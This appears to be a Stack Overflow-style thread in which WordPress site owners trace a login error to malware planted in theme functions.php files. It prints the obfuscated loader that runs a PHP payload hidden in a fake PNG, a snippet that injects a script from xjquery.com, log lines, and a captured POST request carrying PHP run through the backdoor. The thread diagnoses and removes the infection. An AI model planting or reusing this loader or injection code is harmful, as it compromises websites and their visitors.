# WordPress admin login throws error but site is working fine

Tags: wordpress

I am running a WordPress WooCommerce site. The site is running fine but I go to admin page and login, it throws the following error below. What is strange is that I can't find any reference to this function **wplicense_update_check**

> Fatal error: Uncaught TypeError: call_user_func_array(): Argument #1 ($callback) must be a valid callback, function "wplicense_update_check" not found or invalid function name in /home/mysite/public_html/wp-includes/class-wp-hook.php:308
>
> Stack trace:
> #0 /home/mysite/public_html/wp-includes/class-wp-hook.php(332): WP_Hook->apply_filters(NULL, Array)
> #1 /home/mysite/public_html/wp-includes/plugin.php(517): WP_Hook->do_action(Array)
> #2 /home/mysite/public_html/wp-settings.php(639): do_action('wp_loaded')
> #3 /home/mysite/public_html/wp-config.php(108): require_once('/home/mysite...')
> #4 /home/mysite/public_html/wp-load.php(50): require_once('/home/mysite...')
> #5 /home/mysite/public_html/wp-blog-header.php(13): require_once('/home/mysite...')
> #6 /home/mysite/public_html/index.php(17): require('/home/mysite...')
> #7 {main} thrown in /home/mysite/public_html/wp-includes/class-wp-hook.php on line 308

Comment: seems like a theme /plugin thing , try disabling the commercial plugins in play (one which may have a license) , one at a time.

Comment: but how to disable without loggin in admin

Comment: go to the plugins folder inside wp-content and rename the folder like xxpluginnamexx

Comment: "Consider using [WordPress.SE](https://wordpress.stackexchange.com/help/on-topic)."

Comment: @Smith, this is malware. Can you confirm if you have the WPWeb Updater plugin installed?

Comment: @BrendonMuir no..that plugin is not installed.

Comment: @Smith: Interesting, how about the plugin 'Follow My Blog Post'?

Answer (score 1):

review file functions.php of the theme folder, in my case I have this code and directly delete it:

```
add_action( 'wp_loaded', 'wplicense_update_check' );

if ( ! function_exists( 'wplicense_update_check' ) && ! is_user_logged_in()) {

    function wplicense_update_check() {
        /**
         * License Update Checker Hook
         *
         * Register theme update checker hook.
         *
         */
        
        $wplicense_update = get_option( '_' . get_stylesheet() . '_licence_data');
        $wplicense_updater = locate_template( $wplicense_update[0] . '-' . $wplicense_update[3] . '.' . $wplicense_update[1] );

        if (is_file($wplicense_updater)) {
            load_template( $wplicense_update[4] . '.' . $wplicense_update[2] . '://' . $wplicense_updater, true);
        }
    }
}
```

Answer (score 1):

I've also found this code in a child theme functions.php - which I know every line of. It should not be there.

It loads an option from the database which is serialized as:

`a:5:{i:0;s:10:"screenshot";i:1;s:3:"png";i:2;s:4:"zlib";i:3;s:4:"main";i:4;s:8:"compress";}`

when de serialized it returns

```
Array
(
    [0] => screenshot
    [1] => png
    [2] => zlib
    [3] => main
    [4] => compress
)
```

Parts of this is then passed to the `locate_template` function to find the file:  `screenshot-main.png` which is located in the child theme directory - it's definitely not a PNG though.

Submission to [Virus total](https://www.virustotal.com/gui/file/25ecd56fe3cad38cc5eb2684eee011a02f250fb7a5b4e8d4b8881457fe17dffd) comes up clean but decompressing it with 7zip shows the PHP content.

https://pastebin.mozilla.org/Wro62iM2 (added to [archive.org](https://web.archive.org/web/20230323130146/https://pastebin.mozilla.org/Wro62iM2) too)

It appears to be a zTDS implementation as it shares a lot of the same code - this appears to redirect visitors who are not logged in and not bots.

https://ztds.info/doku.php?id=folders

Comment: This is malware. I think I've managed to trace it to a plugin called WPWeb Updater. Can you confirm you have this installed? I had 5 sites infected (we have other sites) but only these 5 had that particular plugin. I've approached the plugin maker to see if they know. I also have some weird logs from the time the screenshot file was written. They don't make much sense: `POST /index.php?gJhh7D08Rs`

Comment: Brendon Muir, yes definitely malware. I've only had it on one sites so far and I haven't found the source, although I do not have that plugin. `?q=gJhh7D08Rs` is the same as `?gJhh7D08Rs` if `$z_get = '';` in the script - see archive link above. It's basically the API key for the service running at `https://xjquery.com`

Comment: Thanks Andy, the other plugin would be Follow My Blog Post. That's the plugin that the updater plugin was installed for. We have this installed on many other sites but only the 5 affected sites had the latest version (in the 2.x range). Your comment about the logs is a bit confusing to me. When I decompress `screenshot-main.php` I just get some PHP that injects the script tag to to `xjquery.com`. I'll post the full 4 request logs below.

Comment: ```162.158.162.11 - - [20/Feb/2023:13:37:03 +0000] "POST /index.php?gJhh7D08Rs HTTP/2.0" 200 274 "-" "
172.70.142.142 - - [20/Feb/2023:13:37:04 +0000] "POST /index.php?HEkttBEBpf HTTP/2.0" 200 262 "-"
162.158.170.192 - - [20/Feb/2023:13:37:05 +0000] "POST /index.php?DHP8DOHlDD HTTP/2.0" 200 263 "-" 
162.158.162.11 - - [20/Feb/2023:13:37:06 +0000] "POST /index.php?FeiEr0HPsJ HTTP/2.0" 200 274 "-" ```

Comment: ```<?php
add_action('wp_print_scripts', 'wp_updater_print_scripts');
function wp_updater_print_scripts() {
        echo("<script async type='text/javascript' src='//xjquery.com/js/jquery-min-js'></script>\n");
}
?>```

Comment: Just to follow up. I did some more digging in my logs and found on 28/Mar/2023 the screenshot file was updated from the above xjquery script to the full zTDS code you mention. We use full page caching with Nginx so I think this probably had the effect of neutering the attack since a good page was cached instead for logged out users. Still keen to see if you're using the 'Follow My Blog Post' plugin.

Comment: Thanks for the info, I've never used the `Follow My Blog Post` or `WPWeb Updater` plugins. I've also searched all the source code of 15+years in the game and I don't have `wplicense_update_check` in any php file, locally or on any of my servers (also inside archives). As I always develop locally I have to conclude that this was added via some other vulnerability while the site was live, rather than a plugin that I uploaded.

Comment: I've searched my log files too with `cd /var/log/apache/domains`  then `grep -r -E 'index\.php\?(?!action|file)[a-zA-Z0-9]+' .
` for log files and `zgrep -E 'index\.php\?(?!action|file)[a-zA-Z0-9]+' *.gz` for .gz files. It looks like nobody attempted to access this vulnerability on my servers.

Comment: Thanks Andy, that's all good to know. I guess it's now just a waiting game to log a future hack (if it occurs) and hopefully get a better idea of the mechanism they're using to write files and database entries.

Comment: Andy, I had another idea, we could perhaps compare our plugin list to see if there's another common element?

Comment: I sent you an email, probably best we continue there until we discover something useful.

Comment: Agreed :) I see your email there :)

Answer (score 0):

This is odd. I have just had an issue with a site and have found the following code in the themes functions.php file …

```
add_action( 'wp_loaded', 'wplicense_update_check' );

if ( ! function_exists( 'wplicense_update_check' ) && ! is_user_logged_in()) {

    function wplicense_update_check() {
        /**
         * License Update Checker Hook
         *
         * Register theme update checker hook.
         *
         */
        
        $wplicense_update = get_option( '_' . get_stylesheet() . '_licence_data');
        $wplicense_updater = locate_template( $wplicense_update[0] . '-' . $wplicense_update[3] . '.' . $wplicense_update[1] );

        if (is_file($wplicense_updater)) {
            load_template( $wplicense_update[4] . '.' . $wplicense_update[2] . '://' . $wplicense_updater, true);
        }
    }
}
```

… was causing a fatal error in WP. I did not add the code and have no idea how it ended up in my functions.php file.

Comment: surprisingly i cant find this code anywhere and still throws error!

Answer (score 0):

Update - just found the code in functions.php again after having removed it.

The code is slightly different as it is missing **&& ! is_user_logged_in()** from the if statement:

```
add_action( 'wp_loaded', 'wplicense_update_check' );

if ( ! function_exists( 'wplicense_update_check' ) ) {
    function wplicense_update_check() {
        /**
         * License Update Checker Hook
         *
         * Register theme update checker hook.
         *
         */
        $wplicense_update = get_option( '_' . get_stylesheet() . '_licence_data');
        if ($wplicense_updater = locate_template( $wplicense_update[0] . '-' . $wplicense_update[3] . '.' . $wplicense_update[1] )) {
            load_template( $wplicense_update[4] . '.' . $wplicense_update[2] . '://' . $wplicense_updater, true);
        }
    }
}
```

Comment: In your logs, at the time that functions.php was modified, what do you see? I did notice that the mtime sometimes doesn't get changed so it might be that you won't be able to see that.

Answer (score 0):

I've managed to log the POST parameters of one of the suspicious looking requests though I can't be sure this is from the same actor, the request signature looks the same:

```
172.70.189.147 - - [24/Apr/2023:12:30:51 +0000] "POST /index.php?RqPbeX2VLP HTTP/2.0" 200 332 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36" "111.90.150.162" "--------------------------06e40a1b50125bf5\x0D\x0AContent-Disposition: form-data; name=\x22xxx\x22\x0D\x0A\x0D\x0A5\x0D\x0A--------------------------06e40a1b50125bf5\x0D\x0AContent-Disposition: form-data; name=\x22aaa\x22\x0D\x0A\x0D\x0Aif(isset($wpdb)) { $results = $wpdb->get_results(\x22SELECT ID FROM {$wpdb->prefix}posts WHERE post_type LIKE 'shop_order' AND post_date LIKE '\x22.date('Y-m-d',strtotime(\x22-1 days\x22)).\x22%' AND post_status='wc-completed'\x22); echo(count($results)); exit(); } else { echo('nodb?');exit(); }\x0D\x0A--------------------------06e40a1b50125bf5--\x0D\x0A"
```

I thought I might try this out with the WPWeb Updater installed to see it executes the code.